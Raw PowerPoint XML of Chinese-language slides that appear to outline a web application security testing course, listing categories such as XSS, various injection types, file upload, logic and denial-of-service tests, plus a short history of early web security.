              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Dom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Flash XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26431489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lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>参数过滤测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其它注入测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>ORM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XPATH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IMAP/SMTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9624117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参数过滤测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其它注入测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>代码注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>响应注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>缓冲区溢出测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32165233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lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>参数过滤测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>特有攻击测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>文件包含攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>变量覆盖攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21357260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参数过滤测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>传测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>各种文件上传测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3191342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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全的早期</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在早期互联网中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>并非互联网的主流应用，相对来说，基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SMTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POP3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等协议的服务拥有着绝大多数的用户，再加上攻击系统软件能直接获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>权限。因此黑客们的主要的攻击目标是网络、操作系统以及系统软件等领域，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全领域的攻击与防御技术均处于非常原始的阶段。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34385190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lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>逻辑功能测试</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>多阶段过程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试不完整输入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试边界信任条件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试交易逻辑</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="679665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zh-CN" dirty="0" smtClean="0"/>
              <a:t>阻断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务测试</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>应用层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>通配符攻击测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>锁定用户账户</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>用户指定型对象分配</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>将用户输入作为循环计数器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>将用户写入的数据写到磁盘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>释放资源失败</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>存储过多会话数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13291508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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>服务</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>信息收集</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WSDL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>结构测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>内容级别测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/REST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>调皮的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>附件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>重现测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
